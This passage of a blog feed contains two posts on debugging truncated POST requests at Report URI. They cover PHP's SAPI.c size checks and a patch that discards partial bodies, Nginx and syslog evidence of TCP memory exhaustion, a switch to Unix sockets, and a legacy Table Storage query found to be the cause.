href="https://github.com/php/php-src/blob/PHP-8.2.11/main/SAPI.c?ref=scotthelme.co.uk#L282-L285" rel="noreferrer">source</a>).</p><p></p><pre><code class="language-c">if ((SG(post_max_size) &gt; 0) &amp;&amp; (SG(read_post_bytes) &gt; SG(post_max_size))) {
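    /* note: this only fires when the bytes read exceed post_max_size; a body that merely falls short of the declared Content-Length sails straight past */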
    php_error_docref(NULL, E_WARNING, &quot;Actual POST length does not match Content-Length, and exceeds &quot; ZEND_LONG_FMT &quot; bytes&quot;, SG(post_max_size));
    break;
}</code></pre><p></p><p>This seems like a sensible sanity check that the size of the POST payload is not exceeding the <code>post_max_size</code> limitation, which defaults to <code>8M</code> if not set, but the error message threw me a little. The first part of the error message states <code>Actual POST length does not match Content-Length</code>, which is precisely the error I&apos;m hoping to catch, but I can&apos;t see how the conditions match the text of the message, so this seems like a mistake in the text. Based on the conditions, a more accurate error text would be <code>POST length exceeds post_max_size</code>, but I have to let them off as this code is <a href="https://github.com/php/php-src/commit/b7ecaacd07b6be07677ed694b5dbc51b609c4263?ref=scotthelme.co.uk#diff-4d6eac2373e7408b73942b18b0c01f88b3610a14254d760cd16496caf1fed429R194" rel="noreferrer">23 years old</a>! The size of the POST is also checked earlier in the same function (<a href="https://github.com/php/php-src/blob/PHP-8.2.11/main/SAPI.c?ref=scotthelme.co.uk#L256:L260" rel="noreferrer">source</a>), before the body is read, by checking the declared <code>content-length</code> against <code>post_max_size</code>, so the check is backed up later after reading the body, and the error text for that earlier check, shown below, is accurate.</p><p></p><pre><code class="language-c">if ((SG(post_max_size) &gt; 0) &amp;&amp; (SG(request_info).content_length &gt; SG(post_max_size))) {
		php_error_docref(NULL, E_WARNING, &quot;POST Content-Length of &quot; ZEND_LONG_FMT &quot; bytes exceeds the limit of &quot; ZEND_LONG_FMT &quot; bytes&quot;,
					SG(request_info).content_length, SG(post_max_size));
		return;
	}</code></pre><p></p><p></p><p>After that, we can run back up through the rest of the call stack and find no additional checks to match the size of the POST that was read against the declared size of the payload. The request will be processed even though we didn&apos;t get all of the request.</p><p></p><h4 id="is-this-a-bug">Is this a bug?</h4><p>I&apos;ve certainly gone backwards and forwards on my answer to this question, but ultimately, I think this is a bug. It boils down to choosing between two options:</p><p></p><ol><li>Should PHP dump the partial request with an error? </li><li>Should PHP attempt to process a partial request?</li></ol><p></p><p>I have looked at this from a security angle, and, so far, I&apos;ve not found a way this can be obviously abused, but it depends on whether receiving partial request payloads would be dangerous for your application. Arguably, this is something you should be handling anyway.</p>
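<p>For what it&apos;s worth, a guard for this at the application level doesn&apos;t need to be complicated. Here&apos;s a minimal sketch, assuming the declared <code>Content-Length</code> header can be trusted, of the kind of check an endpoint could do for itself:</p><p></p><pre><code class="language-php">$rawBody  = file_get_contents(&apos;php://input&apos;);
$declared = (int) ($_SERVER[&apos;CONTENT_LENGTH&apos;] ?? 0);

// If the body we actually received is shorter than what the client
// declared, refuse to process it rather than work on a partial payload.
if ($declared &gt; 0 &amp;&amp; strlen($rawBody) !== $declared) {
    http_response_code(400);
    exit;
}</code></pre><p></p><p>To see behaviour closer to what I was expecting, although not quite, I created a patch for <code>SAPI.c</code> that will dump the whole request body if we get a partial request.</p><p></p><pre><code class="language-c">--- SAPI.c.orig 2023-09-29 12:32:46.020740222 +0000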
+++ SAPI.c      2023-09-29 20:28:36.530234632 +0000
@@ -288,6 +288,12 @@
                                break;
                        }
                }
+
+               if (SG(read_post_bytes) != SG(request_info).content_length) {
+                       php_stream_truncate_set_size(SG(request_info).request_body, 0);
+                       php_error_docref(NULL, E_WARNING, &quot;POST length of &quot; ZEND_LONG_FMT &quot; bytes does not match declared Content-Length &quot; ZEND_LONG_FMT &quot; bytes; all data discarded&quot;, SG(read_post_bytes), SG(request_info).content_length);
+               }
+
                php_stream_rewind(SG(request_info).request_body);
        }
 }</code></pre><p></p><p></p><p>It&apos;s not perfect, but it does give me some clear feedback as to what happened, and, I don&apos;t receive a partial payload to process now. You can see the problem is detected on the final line of this log slice.</p><p></p><pre><code class="language-log">Sep 29 20:23:31 test-server php: Accepted connection: 0ce264eae07198c3c59ae90d04127c39
Sep 29 20:23:31 test-server php: Read 16384 bytes (1024737 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (1008353 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (991969 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (975585 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (959201 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (942817 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (926433 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (910049 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (893665 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (877281 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (860897 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (844513 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (828129 bytes remaining)
Sep 29 20:23:31 test-server php: Read 16384 bytes (811745 bytes remaining)
Sep 29 20:23:31 test-server php: errno 0: Success
Sep 29 20:23:31 test-server php: Read 0 bytes (811745 bytes remaining)
Sep 29 20:23:31 test-server php: POST data reading complete. Size: 229376 bytes (out of 1041121 bytes)
Sep 29 20:23:31 test-server php: POST length of 229376 bytes does not match declared Content-Length 1041121 bytes; all data discarded</code></pre><p></p><p></p><p>I guess the only thing left to do is to raise a bug (<a href="https://github.com/php/php-src/issues/12343?ref=scotthelme.co.uk" rel="noreferrer">done</a>) and see what happens, but for now, at least I finally understand why PHP was trying to process those truncated JSON payloads! &#x1F389;</p><p></p><h4 id="outstanding-questions">Outstanding Questions</h4><p>The final piece of the puzzle that I&apos;m still trying to put together is how we end up in this situation. How does PHP end up reading only part of the request?</p><p>My knowledge of the inner workings of TCP sockets or Unix sockets is basically nothing and I&apos;ve learnt the little that I do know between this blog post and the last one. My current theory looks something like this, and bear in mind, this is mostly guesswork!</p><p></p><ol><li>Nginx receives the full POST request from the client.</li><li>Nginx opens the socket to PHP and starts writing until the buffer is filled?</li><li>PHP is busy so no child process can spawn to handle the request?</li><li>Nginx times out and goes away.</li><li>PHP finally gets around to processing the request, which is limited to the partial content in the buffer.</li><li>PHP processes the partial request.</li></ol><p></p><p>Without knowing more about how sockets work, a large portion of my assumptions might be wrong, so it&apos;d be great to hear from someone with real knowledge in this area. If you can help out, please do drop by the comments below and give me some tips or answers! </p><p></p><p>Another <em>huge</em> thanks has to go to <a href="https://twitter.com/poupas?ref=scotthelme.co.uk" rel="noreferrer">Jo&#xE3;o Poupino</a> again for assistance with this post, it simply wouldn&apos;t have been possible otherwise &#x1F37B;</p><p></p>]]></content:encoded></item><item><title><![CDATA[Unravelling The Mystery Of Truncated POST Requests On Report URI]]></title><description><![CDATA[<p>This blog post is going to detail what was a pretty lengthy journey for me in debugging an elusive issue that started to occur on Report URI recently! It required me to investigate and learn about things that were outside of my area of expertise, created heaps of frustration and</p>]]></description><link>https://scotthelme.co.uk/unravelling-mystery-of-truncated-post-requests-report-uri/</link><guid isPermaLink="false">6501c12b76a89b00010bc7b1</guid><category><![CDATA[Report URI]]></category><category><![CDATA[azure]]></category><category><![CDATA[table storage]]></category><category><![CDATA[nginx]]></category><category><![CDATA[tcp]]></category><category><![CDATA[truncated-post-requests]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Mon, 25 Sep 2023 09:47:14 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/09/image-3-1.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/09/image-3-1.png" alt="Unravelling The Mystery Of Truncated POST Requests On Report URI"><p>This blog post is going to detail what was a pretty lengthy journey for me in debugging an elusive issue that started to occur on Report URI recently! It required me to investigate and learn about things that were outside of my area of expertise, created heaps of frustration and ultimately, of course, turned out to be my fault... 
&#x1F605;</p><p></p><figure class="kg-card kg-image-card"><a href="https://report-uri.com/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/09/report-uri-full.svg" class="kg-image" alt="Unravelling The Mystery Of Truncated POST Requests On Report URI" loading="lazy" width="300" height="58"></a></figure><p></p><h4 id="report-uri">Report URI</h4><p>I&apos;m sure that many regular readers will be familiar with <a href="https://report-uri.com/?ref=scotthelme.co.uk">Report URI</a>, the security monitoring and alerting platform that I founded and operate. Well, recently, I started to observe a sporadic issue that took me a little time to nail down. First, a little on our infrastructure to set the scene. </p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/09/image.png" class="kg-image" alt="Unravelling The Mystery Of Truncated POST Requests On Report URI" loading="lazy" width="1237" height="547" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/09/image.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/09/image.png 1000w, https://scotthelme.co.uk/content/images/2023/09/image.png 1237w" sizes="(min-width: 720px) 720px"></figure><p></p><ol><li>Data is sent by web browsers as a POST request with a JSON payload.</li><li>Requests pass through our Cloudflare Worker which aggregates the JSON payloads from many requests, returning a 201 to the client.</li><li>Aggregated JSON payloads are dispatched to our origin &apos;ingestion&apos; servers on a short time interval.</li><li>The ingestion servers process the reports into Redis.</li><li>The &apos;consumer&apos; servers take batches of reports from Redis, applying advanced filters, threat intelligence, quota restrictions and per-user settings, before placing them into persistent storage in Azure.</li></ol><p></p><p>The problem was occurring on our ingestion servers when we attempted to parse the JSON payload in the POST requests sent to our origin.</p><p></p><h4 id="jsonexception-3">JsonException #3</h4><p>The problem started with log entries of an exception coming from our ingestion servers. It seems fairly innocuous and, apparently, we were getting some invalid JSON payloads.</p><p></p><pre><code>Nette\Utils\JsonException #3
Control character error, possibly incorrectly encoded</code></pre><p></p><p>After inspecting the POST payload in the exception log, it was indeed truncated, causing <code>Json::decode()</code> to throw an exception.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/09/image-1.png" class="kg-image" alt="Unravelling The Mystery Of Truncated POST Requests On Report URI" loading="lazy" width="1585" height="457" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/09/image-1.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/09/image-1.png 1000w, https://scotthelme.co.uk/content/images/2023/09/image-1.png 1585w" sizes="(min-width: 720px) 720px"></figure><p></p><p>I was concerned that the exception log may be truncating the POST payload, as indicated at the end of the line, so I enabled some additional logging when handling the <code>JsonException</code> to log the value of the <code>content_length</code> header (<code>$_SERVER[&apos;CONTENT_LENGTH&apos;]</code>) and the size of the raw POST body that PHP is seeing (<code>strlen(file_get_contents(&apos;php://input&apos;))</code>). Here are the results.</p><p></p><pre><code>[2023-09-02 17-54-26] Problem parsing JSON, content length: 261671
[2023-09-02 17-54-26] Post size was: 65536
[2023-09-02 17-54-27] Problem parsing JSON, content length: 236481
[2023-09-02 17-54-27] Post size was: 65536
[2023-09-02 17-54-27] Problem parsing JSON, content length: 237498
[2023-09-02 17-54-27] Post size was: 65536</code></pre><p></p><p>It does seem that the declared content length is much larger than what PHP is receiving, and it&apos;s not a misleading exception because of truncation in the exception logging; we are actually seeing a truncated payload. It&apos;s also interesting to note that the request body is always truncated at 65,536 bytes regardless of how big the actual payload is.</p><p></p><h4 id="checking-nginx">Checking Nginx</h4><p>My next step was to go upstream and add some additional logging to Nginx which is our web server / proxy in front of PHP-FPM. I wanted to see whether I could observe the same truncated payload behaviour between Nginx and PHP to narrow down where the issue was happening. Here&apos;s the Nginx log format I used.</p><p></p><pre><code>log_format post &apos;$time_local: req_len $request_length - con_len $http_content_length&apos;;</code></pre><p></p><p>This gave me the following log entries when I enabled logging on the ingestion servers.</p><p></p><pre><code>02/Sep/2023:18:13:24 +0000: req_len 205 - con_len 453
02/Sep/2023:18:13:27 +0000: req_len 35266 - con_len 60944
02/Sep/2023:18:13:27 +0000: req_len 389327 - con_len 923803
02/Sep/2023:18:13:27 +0000: req_len 262352 - con_len 1355353
02/Sep/2023:18:13:27 +0000: req_len 207 - con_len 509168</code></pre><p></p><p>I&apos;m using the <code>$request_length</code> <a href="https://nginx.org/en/docs/http/ngx_http_log_module.html?ref=scotthelme.co.uk#var_request_length:~:text=request%20length%20(including%20request%20line%2C%20header%2C%20and%20request%20body)">variable</a> in Nginx which is the &quot;request length (including request line, header, and request body)&quot; and the <code>$http_</code> <a href="https://nginx.org/en/docs/http/ngx_http_core_module.html?ref=scotthelme.co.uk#var_http_:~:text=arbitrary%20request%20header%20field%3B">variable</a> which allows you to log out an &quot;arbitrary request header field&quot;, such as <code>$http_content_length</code>. As you can see, the declared content length is again much larger than the actual request body received. There is always a slight discrepancy here as the <code>$request_length</code> includes the request line and headers, along with the body, and <code>$http_content_length</code> is only the body, but even factoring that in, the difference is significant. </p><p></p><h4 id="checking-the-cloudflare-worker">Checking the Cloudflare Worker</h4><p>At first glance, the logs above led me to our Cloudflare logs which we collect via Log Push, but I was conscious that in this scenario it felt far more likely that I was at fault than them. Still though, I&apos;d gone from PHP, to Nginx and now the next upstream step was to the Cloudflare Worker.</p><p>After trawling through our logs for the corresponding time that we were getting the JSON exceptions (which had stopped of their own accord after ~45 mins), I couldn&apos;t find anything that stood out other than Cloudflare receiving 500 errors from our origin, which was to be expected. Not finding anything particularly useful, it looked like Cloudflare was sending us the requests with a proper payload. I added some additional logging to our Worker so that if the issue were to return, we&apos;d potentially have some extra information to work with.</p><p>Many of the issues I expected we might see should already be logged because Workers will log all uncaught exceptions, but it&apos;s easy to add some <code>console.log()</code> calls which will also be captured (<a href="https://developers.cloudflare.com/workers/observability/log-from-workers/?ref=scotthelme.co.uk"><em>source</em></a>). I also added some additional request headers on requests to our origin so we could log those and compare metrics like the size of the payload before sending with the declared content-length and the observed content-length.</p><p></p><pre><code>  return {
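    // extra debug headers: what the Worker measured, so the origin logs can compare against the declared and observed content-length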
    &quot;X-Request-Body-Length&quot;: requestBodyLen.toString(),
    &quot;X-Distinct-Reports&quot;:  distinctReports.toString(),
    &quot;X-Total-Reports&quot;: totalReports.toString(),
  }</code></pre><p></p><p>I then decided to do some more investigation across our origin servers to look for clues because I still wasn&apos;t sure what had happened. </p><p></p><h4 id="cpu-overload">CPU overload!</h4><p>I took a look at our DigitalOcean dashboard to see how the ingestion servers were holding up during the window that the JSON exceptions were being thrown, and it seems that they were more than a little busy!</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/09/image-2.png" class="kg-image" alt="Unravelling The Mystery Of Truncated POST Requests On Report URI" loading="lazy" width="1027" height="328" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/09/image-2.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/09/image-2.png 1000w, https://scotthelme.co.uk/content/images/2023/09/image-2.png 1027w" sizes="(min-width: 720px) 720px"></figure><p></p><p>Yikes... This seemed odd because the JSON parse was failing, so I&apos;d have assumed that they were doing significantly less than usual because the problematic inbound requests effectively leave them with nothing to do... During the same time window I could also see elevated Load, elevated RAM usage (but still plenty to spare), no noticeable disk activity (so we weren&apos;t paging) and no noticeable change in our ingress (so we didn&apos;t have a traffic spike). Our egress on the ingestion servers did display a drop, but that makes sense because there will be less traffic going to Redis if we&apos;re not processing as many reports. What on Earth is chewing up that much CPU?</p><p></p><h4 id="resource-exhaustion">Resource exhaustion</h4><p>I was caught up on the CPU being slammed at 100% utilisation, especially when we weren&apos;t processing our usual volume of reports. After more research online and more debugging, I took a look at syslog and scrolled back to the time window of the issue and found the following entries.</p><p></p><pre><code>Sep  2 20:22:14 report-ingestion-60 kernel: [12697.456786] TCP: out of memory -- consider tuning tcp_mem
Sep  2 20:22:14 report-ingestion-60 kernel: [12697.485758] TCP: out of memory -- consider tuning tcp_mem
Sep  2 20:22:14 report-ingestion-60 kernel: [12697.520596] TCP: out of memory -- consider tuning tcp_mem
Sep  2 20:22:14 report-ingestion-60 kernel: [12697.826360] TCP: out of memory -- consider tuning tcp_mem
Sep  2 20:22:14 report-ingestion-60 kernel: [12697.973408] TCP: out of memory -- consider tuning tcp_mem
Sep  2 20:22:14 report-ingestion-60 kernel: [12698.075398] TCP: out of memory -- consider tuning tcp_mem
Sep  2 20:22:14 report-ingestion-60 kernel: [12698.183949] TCP: out of memory -- consider tuning tcp_mem
Sep  2 20:22:15 report-ingestion-60 kernel: [12699.001482] TCP: out of memory -- consider tuning tcp_mem
Sep  2 20:22:15 report-ingestion-60 kernel: [12699.073934] TCP: out of memory -- consider tuning tcp_mem
Sep  2 20:22:15 report-ingestion-60 kernel: [12699.148919] TCP: out of memory -- consider tuning tcp_mem
Sep  2 20:22:19 report-ingestion-60 kernel: [12702.594396] net_ratelimit: 42 callbacks suppressed</code></pre><p></p><p>Huh! This at least gave me something to work with so it was off to do some reading up on exactly what this error message means, thinking of possible causes and investigating what a solution might look like.</p><p></p><h4 id="tcp-out-of-memoryconsider-tuning-tcpmem">TCP: out of memory -- consider tuning tcp_mem</h4><p>We&apos;re delving outside of my area of expertise now, but I needed to identify the cause of the issue and put a solution in place so that it wouldn&apos;t happen again. I started off by looking at what <code>tcp_mem</code> is in the Linux <a href="https://man7.org/linux/man-pages/man7/tcp.7.html?ref=scotthelme.co.uk#:~:text=for%20full%20throughput.-,tcp_mem,-(since%20Linux%202.4">manual</a> and I got the following:</p><p></p><pre><code>              This is a vector of 3 integers: [low, pressure, high].
              These bounds, measured in units of the system page size,
              are used by TCP to track its memory usage.  The defaults
              are calculated at boot time from the amount of available
              memory.  (TCP can only use low memory for this, which is
              limited to around 900 megabytes on 32-bit systems.  64-bit
              systems do not suffer this limitation.)

              low    TCP doesn&apos;t regulate its memory allocation when the
                     number of pages it has allocated globally is below
                     this number.

              pressure
                     When the amount of memory allocated by TCP exceeds
                     this number of pages, TCP moderates its memory
                     consumption.  This memory pressure state is exited
                     once the number of pages allocated falls below the
                     low mark.

              high   The maximum number of pages, globally, that TCP
                     will allocate.  This value overrides any other
                     limits imposed by the kernel.</code></pre><p></p><p>This seems straightforward enough and the values are not something that I&apos;ve looked at before. We use the vanilla <code>Ubuntu 22.04 (LTS) x64</code> image from DigitalOcean when creating all of our servers, so the values would still be whatever the defaults were. </p><p></p><pre><code>$cat /proc/sys/net/ipv4/tcp_mem
22302   29739   44604</code></pre><p></p><p>Given that the unit of measurement here is units of system page size, we need that to calculate total size values.</p><p></p><pre><code>$getconf PAGESIZE
4096</code></pre><p></p><p>So, 4096 bytes per page gives us the following.</p><p></p><pre><code>22302 pages x 4096 bytes = 91.348992 MB
29739 pages x 4096 bytes = 121.810944 MB
44604 pages x 4096 bytes = 182.697984 MB</code></pre><p></p><p>I have no idea if these values are suitable or even if/how they should be tuned, so it was time for another venture down a rabbit hole of research!</p><p>After reading countless blog posts on the topic, I wasn&apos;t sure if I knew more or less than I did before... There seem to be countless ways to tackle the problem of tuning these values and people have different opinions on how to calculate the new values too. Another problem that I had was, even if I did tune them, I&apos;d need to come up with a way to reproduce the issue to test the fix, and I didn&apos;t know what was actually causing the problem yet either.</p><p></p><h4 id="what-is-using-tcp-resources">What is using TCP resources?</h4><p>Given that the problem revolves around resource exhaustion, specifically TCP memory resources, one solution could be to simply &apos;add more cloud&apos;. Spreading the load over more servers should certainly help to reduce resource issues, but it&apos;s not the right solution. I took a look at what might be using TCP resources on these systems to see if that might point me to something. </p><p></p><ol><li>The Cloudflare Worker initiates TCP connections to our origin to send HTTPS requests.</li><li>PHP connects to Redis using a TCP socket because the Redis Server sits on our private network.</li></ol><p></p><p>That didn&apos;t seem like a particularly large amount of load but then, <a href="https://twitter.com/spazef0rze?ref=scotthelme.co.uk">Michal &#x160;pa&#x10D;ek</a> (former Report URI staffer and someone I&apos;d reached out to for help), asked me to check how Nginx was talking to PHP. Turns out we were still using the default configuration that has been there since the dawn of Report URI, and that was a TCP socket! So, now, our list of things putting pressure on TCP resources is:</p><p></p><ol><li>Cloudflare Worker --&gt; TCP --&gt; Ingestion Servers</li><li>Nginx --&gt; TCP --&gt; PHP</li><li>PHP --&gt; TCP --&gt; Redis</li></ol><p></p><p>That seems like a really unnecessary overhead and one that&apos;s easy to remove. I switched PHP over to using a Unix Socket instead of a TCP Socket, deployed it on a canary server and waited to see if the change was good. Here&apos;s the config change that this needed along with a service reload for both Nginx and PHP-FPM.</p><p></p><pre><code>nginx v-host config
- fastcgi_pass 127.0.0.1:9000;
+ fastcgi_pass unix:/run/php/php8.2-fpm.sock;

php-fpm config
- listen = 127.0.0.1:9000
+ listen = /run/php/php8.2-fpm.sock</code></pre><p></p><p>The change seemed good with no adverse effects so I deployed it across the entire fleet, not just the ingestion servers. Everything is managed with Ansible so making changes like this across a large number of servers is really easy.</p><p></p><h4 id="then-it-happened-again">Then it happened again...</h4><p>Shit... Having alleviated what should be approximately 1/3 of the load on TCP resources, I was surprised to see this happening again. I wanted to do some investigation while the problem was happening, and fortunately it happened while I was at my desk, so I dug in. I&apos;d also deployed some better monitoring to the fleet in the form of <a href="https://www.netdata.cloud/?ref=scotthelme.co.uk">NetData Monitoring</a> so that I&apos;d have much more detailed information if the issue came back. (thanks for the suggestion <a href="https://twitter.com/poupas?ref=scotthelme.co.uk">Jo&#xE3;o Poupino</a>, who was now also involved in helping out!) </p><p>The issue was much shorter in duration this time, but I had a lot more logging and data ready to help me. It seems that PHP was chewing through all of the CPU resources on the servers.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/09/image-3.png" class="kg-image" alt="Unravelling The Mystery Of Truncated POST Requests On Report URI" loading="lazy" width="1363" height="475" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/09/image-3.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/09/image-3.png 1000w, https://scotthelme.co.uk/content/images/2023/09/image-3.png 1363w" sizes="(min-width: 720px) 720px"></figure><p></p><p>There was also a huge spike in open sockets (file descriptors) coming from Nginx.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/09/image-4.png" class="kg-image" alt="Unravelling The Mystery Of Truncated POST Requests On Report URI" loading="lazy" width="820" height="472" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/09/image-4.png 600w, https://scotthelme.co.uk/content/images/2023/09/image-4.png 820w" sizes="(min-width: 720px) 720px"></figure><p></p><p>This means that Nginx is backlogging requests and that&apos;s likely because PHP is stalled out and I suspect we&apos;ve hit <code>pm.max_children = 64</code> which is what we use in production. The 64 PHP processes are busy, no more can spawn, and Nginx is just going to wait to time out on the <code>fastcgi_pass</code>, causing it to back up on incoming connections. Zooming in, we can see that PHP starts to consume sockets first, but then it plateaus, and shortly after that, nginx goes wild and starts massively ramping up on open sockets. </p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/09/image-15.png" class="kg-image" alt="Unravelling The Mystery Of Truncated POST Requests On Report URI" loading="lazy" width="1297" height="385" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/09/image-15.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/09/image-15.png 1000w, https://scotthelme.co.uk/content/images/2023/09/image-15.png 1297w" sizes="(min-width: 720px) 720px"></figure><p></p><p>Seems like a solid theory, but, why? 
What could PHP possibly be doing, especially as the same truncation of POST requests is happening so it should be doing basically nothing!</p><p></p><h4 id="looking-at-the-logs-more-closely">Looking at the logs more closely</h4><p>As you saw above, the issue started and stopped within ~1 minute and I didn&apos;t change or do anything to impact that. It also happened across our entire fleet of ingestion servers during the same window, give or take a second or two, which makes this more interesting and suggested a factor external to the ingestion servers. We centralise <em>all</em> of our logs to <a href="https://www.papertrail.com/?ref=scotthelme.co.uk">Papertrail</a> so I could go and take a time-slice for these two events and look at everything that happened across all of our servers. Of course, there were many of the expected log events with the <code>TCP: out of memory -- consider tuning tcp_mem</code> happening across both incidents and the improved <code>JsonException</code> logging giving me more information too. As before, it seemed like the requests coming from Cloudflare were doing just fine and then, when they hit our origin, the problems began.</p><p>This was when I spotted something that I&apos;d seen before in the logs during the first incident, but noticed that these entries were also present in the second incident too. I&apos;d been focusing on the ingestion servers but I now noticed that some of our other servers were throwing a very small number of seemingly unrelated errors at the same time. I widened the time-slice to see if these other servers were throwing the errors before and/or after the incident and it turns out, they weren&apos;t.</p><p></p><pre><code>Sep 18 15:28:36 report-consumer-65 info.log [2023-09-18 15-28-36] We lost a batch (actually 10): cURL error 7: Failed to connect to reporturi.table.core.windows.net port 443 after 444 ms: Connection refused (see https://curl.haxx.se/libcurl/c/libcurl-errors.html) for https://reporturi.table.core.windows.net/$batch  @  CLI (PID: 1657091): /var/www/html/report-uri/public/www/index.php Process  @@@  git:40620dc</code></pre><p></p><p>Our consumer servers sit behind Redis and pull out batches of reports to process into Azure Table Storage, and they were receiving a variety of errors when talking to Azure. There were connection timeout errors, connection refused errors and then successful connections, but a 503 Service Unavailable response. It seemed odd that these issues were starting and stopping during the same time window that our ingestion servers were having their issues, even though the two are isolated and independent from each other. I hadn&apos;t thought to look much into our Redis server because it already has some very tight monitoring and alerting set up, and I hadn&apos;t observed any issues with it throughout. There was a minor drop in traffic from the ingestion servers during the incident, again expected, but other than that, it was doing just fine. I then noticed something else in the logs.</p><p></p><h4 id="batches-of-rejected-reports">Batches of Rejected Reports</h4><p>When the Cloudflare Worker talks to our origin, there are three endpoints that reports can be sent to. 
We have <code>batch_reports()</code>, which is for a batch of reports to be processed as normal into your account and visible in the Reports/Graphs pages; we have <code>batch_wizard()</code>, which is for a batch of reports that were sent to the <a href="https://docs.report-uri.com/setup/wizard/?ref=scotthelme.co.uk">CSP Wizard</a>; and then <code>batch_reject()</code>, which is for reports that the Worker rejected and only need to be counted in your Rejected Reports metrics but not otherwise processed. The vast majority of the exceptions being thrown when parsing the JSON were for requests sent to the <code>batch_reject()</code> endpoint, the one that seemingly has the least to actually do! I decided to walk through the code and refresh my memory because, after all, this was written quite a number of years ago. Here are the three methods, nice and simple:</p><p></p><pre><code class="language-php">	public function batch_reports(): void
	{
		$this-&gt;checkRequestIsPost();
		$this-&gt;batch(RedisKeys::REPORTS());
	}


	public function batch_wizard(): void
	{
		$this-&gt;checkRequestIsPost();
		$this-&gt;batch(RedisKeys::WIZARD());
	}


	public function batch_reject(): void
	{
		$this-&gt;checkRequestIsPost();
		$rawBody = $this-&gt;httpRequest-&gt;getRawBody();
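		// Decode the batch of rejected reports; on failure, log the claimed
		// content length against the size of the body we actually received.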
		try {
			$rejects = $rawBody ? Json::decode($rawBody, Json::FORCE_ARRAY) : null;
		} catch (JsonException) {
			Debugger::log(&apos;Problem parsing REJECT JSON, content length: &apos; . $_SERVER[&apos;CONTENT_LENGTH&apos;]);
			Debugger::log(&apos;Post size was: &apos; . strlen($rawBody));
			$rejects = null;
		}
		if (is_array($rejects) &amp;&amp; count($rejects) &gt; 0) {
			$this-&gt;reject-&gt;toRedis($rejects);
		}
		$this-&gt;output-&gt;set_status_header(201);
	}</code></pre><p></p><p>As you can see, <code>batch_reports()</code> and <code>batch_wizard()</code> go straight to Redis, while <code>batch_reject()</code> has the extra bit of logging I&apos;d added and puts these reports into Redis using <code>$this-&gt;reject-&gt;toRedis()</code> instead. This is when I quickly started to unravel things.</p><p></p><h4 id="a-quick-history-lesson">A quick history lesson</h4><p>The Cloudflare Worker used to buffer and pass reports to our ingestion servers, where the existence of the user would then be checked and the reports processed if a user existed to receive them, or rejected otherwise. This was a lot of load on the ingestion servers at what is the highest-velocity segment of our processing pipeline, so, ~5 years ago we built a new feature so the Worker could maintain state about our users. By giving the Worker the ability to query our origin and check for the existence of a user, and then caching the result locally, we could have the Worker discard reports much sooner in the process. This is where <code>batch_reject()</code> came in above, using slightly different code.</p><p>We also wanted to avoid hitting Table Storage so aggressively to query the existence of a user so we implemented a service that would maintain a &apos;User Entity Cache&apos; in Redis and keep it aligned with Table Storage. Now, services could query Redis instead of Table Storage and we saw some enormous performance improvements and a reduction in load on Table Storage as a result. Over time, more and more areas of our code were migrated to use this new User Entity Cache and we now have a <code>User Entity</code> service that will transparently query Redis first, and then gracefully fall back to Table Storage if needed, populating Redis in the process. </p><p>Except, this old rejected report code wasn&apos;t using that process... Calling <code>$this-&gt;reject-&gt;toRedis()</code> still has a direct dependency on Table Storage, despite what the name implies.</p><p></p><h4 id="one-query-to-rule-them-all-one-query-to-find-them-one-query-to-bring-them-all-and-in-the-darkness-bind-them">One query to rule them all<br>One query to find them<br>One query to bring them all<br>And in the darkness bind them<br></h4><p>Our <code>batch_reject()</code> code was still using a fairly legacy approach to handling these reports and would simply grab the list of our users from Table Storage and run the list of rejected reports against the user list, counting rejected reports where users existed and discarding them otherwise. This worked pretty well and had actually worked fine up until now. Table Storage is fast, queries are cheap, and sure, it&apos;s a bad approach, but it&apos;s never been a problem. But, we&apos;re a lot bigger now with a lot more users than before. This is where the problem came in.</p><p>A query to grab the list of all our users used to be quite a small one. Heck, when we started there was only one user in there! Over time though, that number of users has increased to hundreds, then thousands, and then tens of thousands, and now, we&apos;re closing the gap to six figures.</p>
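<p>To make the contrast concrete, here&apos;s a minimal sketch of the kind of cache-aside lookup the User Entity Cache performs. This is illustrative rather than our actual code: the function name, key format, TTL and the phpredis client are all assumptions.</p><p></p><pre><code class="language-php">// Minimal cache-aside lookup: check Redis first, only fall back to
// Table Storage on a miss, and re-populate Redis for next time.
// Names, TTL and the phpredis client are illustrative assumptions.
function userExists(Redis $redis, callable $tableStorageLookup, string $user): bool
{
	$key = &apos;user-exists:&apos; . $user;
	$cached = $redis-&gt;get($key);
	if ($cached !== false) {
		return $cached === &apos;1&apos;; // Cache hit: Table Storage is never touched
	}
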